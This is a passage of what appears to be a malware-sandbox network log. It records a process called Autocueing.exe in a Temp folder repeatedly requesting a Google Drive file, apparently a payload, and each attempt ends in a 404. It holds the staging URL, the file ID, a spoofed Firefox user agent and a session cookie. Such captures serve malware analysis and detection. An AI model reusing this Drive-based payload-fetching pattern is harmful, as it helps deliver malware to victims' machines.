                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:50 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-xUj23TPjxuBHTjgGwAruUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                    43    192.168.2.6    50028    142.250.185.129    443    5140    C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                    2025-01-11 04:28:51 UTC    459    OUT    GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:52 UTC    1851    IN    HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTNrnN8o8l8VfOKBCFiTG82L0PDpFCMu2bqAn80o_z8fWYs32ddZh28UwI24Uy6lKVZP8soGB8
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:51 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-PWz03kX-0s5EO-LAHtJd6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:52 UTC    1652    IN
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="daF7a5SYJC0OthYw9qwP2Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                    44    192.168.2.6    50029    142.250.185.142    443    5140    C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                    2025-01-11 04:28:53 UTC    417    OUT    GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:53 UTC    1920    IN    HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:53 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-eL1v56B56Gctbdi5NnPdaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                    45    192.168.2.6    50030    142.250.185.129    443    5140    C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                    2025-01-11 04:28:53 UTC    459    OUT    GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:54 UTC    1844    IN    HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC76krFNKrWk2era1CLv4MbRxEgmz_nfuGCHq1RVD8g1_UWo3K6LSMp6nc3tgQK0KapK
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:54 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-wnKkzTf98lew9WJKLRDlxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:54 UTC    1652    IN
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2yYnsuBms55KrfF79Yvx-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                                                                    46    192.168.2.6    50031    142.250.185.142    443    5140    C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                    2025-01-11 04:28:55 UTC    417    OUT    GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:55 UTC    1920    IN    HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:55 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-g3Of4dK8-e4ofJK6U6BuKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    47 | 192.168.2.6 | 50032 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:56 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:56 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5JyON8aNtOox4u7xav2NZ84Q8nsp5H9-BaLv35dhSk0iulRMLbe4Ez5kv8y2LueJZv
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:56 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-BGOonSUYkufnMVzv9c35tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:56 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UN8COnwAiWTB3H3hbzcLFQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    48 | 192.168.2.6 | 50033 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:57 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:57 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:57 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-mTo-kavvWeaw0DwKbwCx4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    49 | 192.168.2.6 | 50034 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:58 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:59 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQzs32MxJrFS3F9gKWhpEUGzMuNjqOp9QTTGw8MEZswz0d0bRirdZTbkDlf3ppvvASn8lzoGzI
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:58 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Pa1J2QkUsDZKUOWdYX-70w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:59 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z7J_E3PgmCnd4Gj-Pr4yCQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    50 | 192.168.2.6 | 50035 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:59 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
